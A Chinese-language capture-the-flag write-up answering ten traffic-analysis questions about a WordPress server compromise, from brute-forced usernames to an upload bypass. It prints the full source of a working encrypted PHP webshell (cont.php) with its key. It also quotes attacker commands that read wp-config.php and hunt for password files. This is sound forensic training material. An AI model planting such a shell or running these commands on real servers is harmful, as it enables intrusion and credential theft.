前言

记录DIDCTF中的2024龙信杯的流量分析题目。

1、流量分析-1

分析流量包检材，给出管理员对web环境进行管理的工具名。（标准格式：小皮）

这个题真是学到了，从DNS记录里看到，服务器请求了宝塔(check.bt.cn)：

所以使用的管理工具是宝塔

2、流量分析-2

分析流量包检材，给出攻击者的ip地址是多少。（标准格式：127.0.0.1）

随便找个攻击的请求，我这里找到的TCP流的597：

这个肯定是木马的流量了，请求方向是192.168.209.135->192.168.209.147

攻击者IP：192.168.209.135

3、流量分析-3

分析流量包检材，给出攻击者爆破出的网站非管理员用户名是。（标准格式：admin）

wordpress的登录页面是wp-login.php，直接过滤http contains "wp-login.php"

账号不存在则返回：错误：未在本站点注册……

所有登录的请求都在TCP流的56中，这也是个考眼力的题：

显示密码不正确说明用户名是对的，总共这两个正确的用户名：luna、saber

至于哪个是非管理员从名字也看不出来，提交后答案是：saber

4、流量分析-4

分析流量包检材，攻击者进行目录扫描得到的具有后门的页面url路径为。（标准格式：/abc.html）

首先看到后面一直在请求cont.php文件，并且看了一下应该就是木马的流量：

那就是上传了这个cont.php，那么我们找到上传的页面应该就是了……

最后在TCP流的93：

上传页面是up_load.php，提交不对……格式是：/up_load.html

5、流量分析-5

分析流量包检材，攻击者通过修改请求包中的哪个字段导致恶意文件成功上传。（标准格式：test-type）

TCP流的93，还是上个题的图，如果上传的是php文件，文件类型不可能是image/jpeg，所以肯定是修改的Content-Type

6、流量分析-6

分析流量包检材，攻击者上传成功的恶意文件, 该文件的临时存放路径是。（标准格式：/abc/edf）

TCP流的93肯定是上传的恶意文件，查看服务器的返回信息：

路径：/tmp/php38mbeJ

7、流量分析-7

分析流量包检材，服务器php配置文件的存放位置（标准格式：/www/sev/php.ini）

这个估计在攻击者执行的命令中，那么要先对流量包进行解密了，先找到cont.php的源码：

# tcp.stream eq 93<?php@error_reporting(0);session_start(); $key="e45e329feb5d925b"; $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input");if(!extension_loaded('openssl')) {  $t="base64_"."decode";  $post=$t($post."");for($i=0;$i<strlen($post);$i++) {        $post[$i] = $post[$i]^$key[$i+1&15];        } }else {  $post=openssl_decrypt($post, "AES128", $key); }    $arr=explode('|',$post);    $func=$arr[0];    $params=$arr[1];classC{publicfunction__invoke($p){eval($p."");}}    @call_user_func(new C(),$params);?>

根据代码解密通信流量：（加密方式CBC，IV要输32个0，不然解不开，原因不知道）

过滤出所有的cont.php的流量http contains "cont.php"，然后一个个解密与分析，找到TCP流的94是phpinfo界面：

但是里面大多数都是图片的base64，无法直观的看到，一个个转图片又很麻烦，所以直接把代码保存为html，用浏览器打开，得到了phpinfo页面：

直接看到了php.ini的路径：/www/server/php/82/etc/php.ini

8、流量分析-8

分析流量包检材，被攻击的web环境其数据库密码是。（标准格式：qwer1234）

TCP流的127：

攻击者执行了cat wp-config.php：

页面返回了wp-config.php的内容：

密码：X847Z3QzF1a6MHjR

9、流量分析-9

分析流量包检材，服务器管理存放临时登录密码的位置。（标准格式：/tmp/pass）

TCP流的609：

攻击者执行了find / -name "*pass*" 2>/dev/null > files：

页面返回的结果如下：

在里面找到/tmp/tmppass

10、流量分析-10

分析流量包检材，黑客获取的高权限主机的登录密码。（标准格式：qwer1234）

在TCP流的612中，攻击者执行了：cat /tmp/tmppass

那么解密服务器返回的流量：

密码：passwd!@#